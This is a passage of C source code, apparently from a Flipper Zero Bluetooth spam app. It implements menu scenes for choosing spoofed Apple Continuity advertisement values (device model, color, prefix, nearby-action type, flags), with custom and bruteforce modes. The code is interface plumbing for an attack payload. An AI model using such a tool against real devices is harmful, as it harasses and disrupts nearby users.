  746. submenu_add_item(submenu, pp_models[i].name, i + 1, pp_model_callback, ctx);
  747. if(!found && value && cfg->data.proximity_pair.model == pp_models[i].value) {
  748. found = true;
  749. selected = i + 1;
  750. }
  751. }
  752. submenu_add_item(submenu, "Custom", pp_models_count + 1, pp_model_callback, ctx);
  753. if(!found && value) {
  754. selected = pp_models_count + 1;
  755. }
  756. submenu_add_item(submenu, "Bruteforce", pp_models_count + 2, pp_model_callback, ctx);
  757. if(!value && payload->mode == PayloadModeBruteforce) {
  758. selected = pp_models_count + 2;
  759. }
  760. submenu_set_selected_item(submenu, selected);
  761. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  762. }
  763. bool scene_continuity_pp_model_on_event(void* _ctx, SceneManagerEvent event) {
  764. UNUSED(_ctx);
  765. UNUSED(event);
  766. return false;
  767. }
  768. void scene_continuity_pp_model_on_exit(void* _ctx) {
  769. UNUSED(_ctx);
  770. }
  771. static void pp_model_custom_callback(void* _ctx) {
  772. Ctx* ctx = _ctx;
  773. Payload* payload = &ctx->attack->payload;
  774. ContinuityCfg* cfg = &payload->cfg.continuity;
  775. if(payload->mode != PayloadModeBruteforce ||
  776. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceModel)
  777. payload->mode = PayloadModeValue;
  778. cfg->data.proximity_pair.model = (ctx->byte_store[0] << 0x08) + (ctx->byte_store[1] << 0x00);
  779. scene_manager_previous_scene(ctx->scene_manager);
  780. scene_manager_previous_scene(ctx->scene_manager);
  781. }
  782. void scene_continuity_pp_model_custom_on_enter(void* _ctx) {
  783. Ctx* ctx = _ctx;
  784. Payload* payload = &ctx->attack->payload;
  785. ContinuityCfg* cfg = &payload->cfg.continuity;
  786. ByteInput* byte_input = ctx->byte_input;
  787. byte_input_set_header_text(byte_input, "Enter custom Model Code");
  788. ctx->byte_store[0] = (cfg->data.proximity_pair.model >> 0x08) & 0xFF;
  789. ctx->byte_store[1] = (cfg->data.proximity_pair.model >> 0x00) & 0xFF;
  790. byte_input_set_result_callback(
  791. byte_input, pp_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 2);
  792. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  793. }
  794. bool scene_continuity_pp_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
  795. UNUSED(_ctx);
  796. UNUSED(event);
  797. return false;
  798. }
  799. void scene_continuity_pp_model_custom_on_exit(void* _ctx) {
  800. UNUSED(_ctx);
  801. }
  802. static void pp_color_callback(void* _ctx, uint32_t index) {
  803. Ctx* ctx = _ctx;
  804. Payload* payload = &ctx->attack->payload;
  805. ContinuityCfg* cfg = &payload->cfg.continuity;
  806. uint8_t model_index = 0;
  807. uint8_t colors_count = 0;
  808. if(payload->mode == PayloadModeValue ||
  809. (payload->mode == PayloadModeBruteforce &&
  810. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)) {
  811. for(; model_index < pp_models_count; model_index++) {
  812. if(cfg->data.proximity_pair.model == pp_models[model_index].value) {
  813. colors_count = pp_models[model_index].colors_count;
  814. break;
  815. }
  816. }
  817. }
  818. if(index == colors_count) {
  819. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpColorCustom);
  820. } else if(index == colors_count + 1U) {
  821. payload->mode = PayloadModeBruteforce;
  822. payload->bruteforce.counter = 0;
  823. payload->bruteforce.value = cfg->data.proximity_pair.color;
  824. payload->bruteforce.size = 1;
  825. cfg->data.proximity_pair.bruteforce_mode = ContinuityPpBruteforceColor;
  826. scene_manager_previous_scene(ctx->scene_manager);
  827. } else {
  828. if(payload->mode != PayloadModeBruteforce ||
  829. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)
  830. payload->mode = PayloadModeValue;
  831. cfg->data.proximity_pair.color = pp_models[model_index].colors[index].value;
  832. scene_manager_previous_scene(ctx->scene_manager);
  833. }
  834. }
  835. void scene_continuity_pp_color_on_enter(void* _ctx) {
  836. Ctx* ctx = _ctx;
  837. Payload* payload = &ctx->attack->payload;
  838. ContinuityCfg* cfg = &payload->cfg.continuity;
  839. Submenu* submenu = ctx->submenu;
  840. uint32_t selected = 0;
  841. submenu_reset(submenu);
  842. bool value = payload->mode == PayloadModeValue ||
  843. (payload->mode == PayloadModeBruteforce &&
  844. cfg->data.proximity_pair.bruteforce_mode != ContinuityPpBruteforceColor);
  845. bool found = false;
  846. uint8_t colors_count = 0;
  847. if(payload->mode == PayloadModeValue ||
  848. (payload->mode == PayloadModeBruteforce &&
  849. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)) {
  850. for(uint8_t i = 0; i < pp_models_count; i++) {
  851. if(cfg->data.proximity_pair.model == pp_models[i].value) {
  852. colors_count = pp_models[i].colors_count;
  853. for(uint8_t j = 0; j < colors_count; j++) {
  854. submenu_add_item(
  855. submenu, pp_models[i].colors[j].name, j, pp_color_callback, ctx);
  856. if(!found && value &&
  857. cfg->data.proximity_pair.color == pp_models[i].colors[j].value) {
  858. found = true;
  859. selected = j;
  860. }
  861. }
  862. break;
  863. }
  864. }
  865. }
  866. submenu_add_item(submenu, "Custom", colors_count, pp_color_callback, ctx);
  867. if(!found && value) {
  868. selected = colors_count;
  869. }
  870. submenu_add_item(submenu, "Bruteforce", colors_count + 1, pp_color_callback, ctx);
  871. if(!value && payload->mode == PayloadModeBruteforce) {
  872. selected = colors_count + 1;
  873. }
  874. submenu_set_selected_item(submenu, selected);
  875. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  876. }
  877. bool scene_continuity_pp_color_on_event(void* _ctx, SceneManagerEvent event) {
  878. UNUSED(_ctx);
  879. UNUSED(event);
  880. return false;
  881. }
  882. void scene_continuity_pp_color_on_exit(void* _ctx) {
  883. UNUSED(_ctx);
  884. }
  885. static void pp_color_custom_callback(void* _ctx) {
  886. Ctx* ctx = _ctx;
  887. Payload* payload = &ctx->attack->payload;
  888. ContinuityCfg* cfg = &payload->cfg.continuity;
  889. if(payload->mode != PayloadModeBruteforce ||
  890. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)
  891. payload->mode = PayloadModeValue;
  892. cfg->data.proximity_pair.color = (ctx->byte_store[0] << 0x00);
  893. scene_manager_previous_scene(ctx->scene_manager);
  894. scene_manager_previous_scene(ctx->scene_manager);
  895. }
  896. void scene_continuity_pp_color_custom_on_enter(void* _ctx) {
  897. Ctx* ctx = _ctx;
  898. Payload* payload = &ctx->attack->payload;
  899. ContinuityCfg* cfg = &payload->cfg.continuity;
  900. ByteInput* byte_input = ctx->byte_input;
  901. byte_input_set_header_text(byte_input, "Enter custom Device Color");
  902. ctx->byte_store[0] = (cfg->data.proximity_pair.color >> 0x00) & 0xFF;
  903. byte_input_set_result_callback(
  904. byte_input, pp_color_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  905. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  906. }
  907. bool scene_continuity_pp_color_custom_on_event(void* _ctx, SceneManagerEvent event) {
  908. UNUSED(_ctx);
  909. UNUSED(event);
  910. return false;
  911. }
  912. void scene_continuity_pp_color_custom_on_exit(void* _ctx) {
  913. UNUSED(_ctx);
  914. }
  915. static void pp_prefix_callback(void* _ctx, uint32_t index) {
  916. Ctx* ctx = _ctx;
  917. Payload* payload = &ctx->attack->payload;
  918. ContinuityCfg* cfg = &payload->cfg.continuity;
  919. switch(index) {
  920. case 0:
  921. cfg->data.proximity_pair.prefix = 0x00;
  922. scene_manager_previous_scene(ctx->scene_manager);
  923. break;
  924. case pp_prefixes_count + 1:
  925. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpPrefixCustom);
  926. break;
  927. default:
  928. cfg->data.proximity_pair.prefix = pp_prefixes[index - 1].value;
  929. scene_manager_previous_scene(ctx->scene_manager);
  930. break;
  931. }
  932. }
  933. void scene_continuity_pp_prefix_on_enter(void* _ctx) {
  934. Ctx* ctx = _ctx;
  935. Payload* payload = &ctx->attack->payload;
  936. ContinuityCfg* cfg = &payload->cfg.continuity;
  937. Submenu* submenu = ctx->submenu;
  938. uint32_t selected = 0;
  939. bool found = false;
  940. submenu_reset(submenu);
  941. submenu_add_item(submenu, "Automatic", 0, pp_prefix_callback, ctx);
  942. if(cfg->data.proximity_pair.prefix == 0x00) {
  943. found = true;
  944. selected = 0;
  945. }
  946. for(uint8_t i = 0; i < pp_prefixes_count; i++) {
  947. submenu_add_item(submenu, pp_prefixes[i].name, i + 1, pp_prefix_callback, ctx);
  948. if(!found && cfg->data.proximity_pair.prefix == pp_prefixes[i].value) {
  949. found = true;
  950. selected = i + 1;
  951. }
  952. }
  953. submenu_add_item(submenu, "Custom", pp_prefixes_count + 1, pp_prefix_callback, ctx);
  954. if(!found) {
  955. selected = pp_prefixes_count + 1;
  956. }
  957. submenu_set_selected_item(submenu, selected);
  958. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  959. }
  960. bool scene_continuity_pp_prefix_on_event(void* _ctx, SceneManagerEvent event) {
  961. UNUSED(_ctx);
  962. UNUSED(event);
  963. return false;
  964. }
  965. void scene_continuity_pp_prefix_on_exit(void* _ctx) {
  966. UNUSED(_ctx);
  967. }
  968. static void pp_prefix_custom_callback(void* _ctx) {
  969. Ctx* ctx = _ctx;
  970. Payload* payload = &ctx->attack->payload;
  971. ContinuityCfg* cfg = &payload->cfg.continuity;
  972. cfg->data.proximity_pair.prefix = (ctx->byte_store[0] << 0x00);
  973. scene_manager_previous_scene(ctx->scene_manager);
  974. scene_manager_previous_scene(ctx->scene_manager);
  975. }
  976. void scene_continuity_pp_prefix_custom_on_enter(void* _ctx) {
  977. Ctx* ctx = _ctx;
  978. Payload* payload = &ctx->attack->payload;
  979. ContinuityCfg* cfg = &payload->cfg.continuity;
  980. ByteInput* byte_input = ctx->byte_input;
  981. byte_input_set_header_text(byte_input, "Enter custom Prefix");
  982. ctx->byte_store[0] = (cfg->data.proximity_pair.prefix >> 0x00) & 0xFF;
  983. byte_input_set_result_callback(
  984. byte_input, pp_prefix_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  985. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  986. }
  987. bool scene_continuity_pp_prefix_custom_on_event(void* _ctx, SceneManagerEvent event) {
  988. UNUSED(_ctx);
  989. UNUSED(event);
  990. return false;
  991. }
  992. void scene_continuity_pp_prefix_custom_on_exit(void* _ctx) {
  993. UNUSED(_ctx);
  994. }
  995. static void na_action_callback(void* _ctx, uint32_t index) {
  996. Ctx* ctx = _ctx;
  997. Payload* payload = &ctx->attack->payload;
  998. ContinuityCfg* cfg = &payload->cfg.continuity;
  999. switch(index) {
  1000. case 0:
  1001. payload->mode = PayloadModeRandom;
  1002. scene_manager_previous_scene(ctx->scene_manager);
  1003. break;
  1004. case na_actions_count + 1:
  1005. scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaActionCustom);
  1006. break;
  1007. case na_actions_count + 2:
  1008. payload->mode = PayloadModeBruteforce;
  1009. payload->bruteforce.counter = 0;
  1010. payload->bruteforce.value = cfg->data.nearby_action.action;
  1011. payload->bruteforce.size = 1;
  1012. scene_manager_previous_scene(ctx->scene_manager);
  1013. break;
  1014. default:
  1015. payload->mode = PayloadModeValue;
  1016. cfg->data.nearby_action.action = na_actions[index - 1].value;
  1017. scene_manager_previous_scene(ctx->scene_manager);
  1018. break;
  1019. }
  1020. }
  1021. void scene_continuity_na_action_on_enter(void* _ctx) {
  1022. Ctx* ctx = _ctx;
  1023. Payload* payload = &ctx->attack->payload;
  1024. ContinuityCfg* cfg = &payload->cfg.continuity;
  1025. Submenu* submenu = ctx->submenu;
  1026. uint32_t selected = 0;
  1027. submenu_reset(submenu);
  1028. submenu_add_item(submenu, "Random", 0, na_action_callback, ctx);
  1029. if(payload->mode == PayloadModeRandom) {
  1030. selected = 0;
  1031. }
  1032. bool found = false;
  1033. for(uint8_t i = 0; i < na_actions_count; i++) {
  1034. submenu_add_item(submenu, na_actions[i].name, i + 1, na_action_callback, ctx);
  1035. if(!found && payload->mode == PayloadModeValue &&
  1036. cfg->data.nearby_action.action == na_actions[i].value) {
  1037. found = true;
  1038. selected = i + 1;
  1039. }
  1040. }
  1041. submenu_add_item(submenu, "Custom", na_actions_count + 1, na_action_callback, ctx);
  1042. if(!found && payload->mode == PayloadModeValue) {
  1043. selected = na_actions_count + 1;
  1044. }
  1045. submenu_add_item(submenu, "Bruteforce", na_actions_count + 2, na_action_callback, ctx);
  1046. if(payload->mode == PayloadModeBruteforce) {
  1047. selected = na_actions_count + 2;
  1048. }
  1049. submenu_set_selected_item(submenu, selected);
  1050. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  1051. }
  1052. bool scene_continuity_na_action_on_event(void* _ctx, SceneManagerEvent event) {
  1053. UNUSED(_ctx);
  1054. UNUSED(event);
  1055. return false;
  1056. }
  1057. void scene_continuity_na_action_on_exit(void* _ctx) {
  1058. UNUSED(_ctx);
  1059. }
  1060. static void na_action_custom_callback(void* _ctx) {
  1061. Ctx* ctx = _ctx;
  1062. Payload* payload = &ctx->attack->payload;
  1063. ContinuityCfg* cfg = &payload->cfg.continuity;
  1064. payload->mode = PayloadModeValue;
  1065. cfg->data.nearby_action.action = (ctx->byte_store[0] << 0x00);
  1066. scene_manager_previous_scene(ctx->scene_manager);
  1067. scene_manager_previous_scene(ctx->scene_manager);
  1068. }
  1069. void scene_continuity_na_action_custom_on_enter(void* _ctx) {
  1070. Ctx* ctx = _ctx;
  1071. Payload* payload = &ctx->attack->payload;
  1072. ContinuityCfg* cfg = &payload->cfg.continuity;
  1073. ByteInput* byte_input = ctx->byte_input;
  1074. byte_input_set_header_text(byte_input, "Enter custom Action Type");
  1075. ctx->byte_store[0] = (cfg->data.nearby_action.action >> 0x00) & 0xFF;
  1076. byte_input_set_result_callback(
  1077. byte_input, na_action_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  1078. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  1079. }
  1080. bool scene_continuity_na_action_custom_on_event(void* _ctx, SceneManagerEvent event) {
  1081. UNUSED(_ctx);
  1082. UNUSED(event);
  1083. return false;
  1084. }
  1085. void scene_continuity_na_action_custom_on_exit(void* _ctx) {
  1086. UNUSED(_ctx);
  1087. }
  1088. static void na_flags_callback(void* _ctx) {
  1089. Ctx* ctx = _ctx;
  1090. scene_manager_previous_scene(ctx->scene_manager);
  1091. }
  1092. void scene_continuity_na_flags_on_enter(void* _ctx) {
  1093. Ctx* ctx = _ctx;
  1094. Payload* payload = &ctx->attack->payload;
  1095. ContinuityCfg* cfg = &payload->cfg.continuity;
  1096. ByteInput* byte_input = ctx->byte_input;
  1097. byte_input_set_header_text(byte_input, "Press back for automatic");
  1098. ctx->byte_store[0] = (cfg->data.nearby_action.flags >> 0x00) & 0xFF;
  1099. byte_input_set_result_callback(
  1100. byte_input, na_flags_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  1101. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  1102. }
  1103. bool scene_continuity_na_flags_on_event(void* _ctx, SceneManagerEvent event) {
  1104. Ctx* ctx = _ctx;
  1105. if(event.type == SceneManagerEventTypeBack) {
  1106. ctx->byte_store[0] = 0x00;
  1107. }
  1108. return false;
  1109. }
  1110. void scene_continuity_na_flags_on_exit(void* _ctx) {
  1111. Ctx* ctx = _ctx;
  1112. Payload* payload = &ctx->attack->payload;
  1113. ContinuityCfg* cfg = &payload->cfg.continuity;
  1114. cfg->data.nearby_action.flags = (ctx->byte_store[0] << 0x00);
  1115. }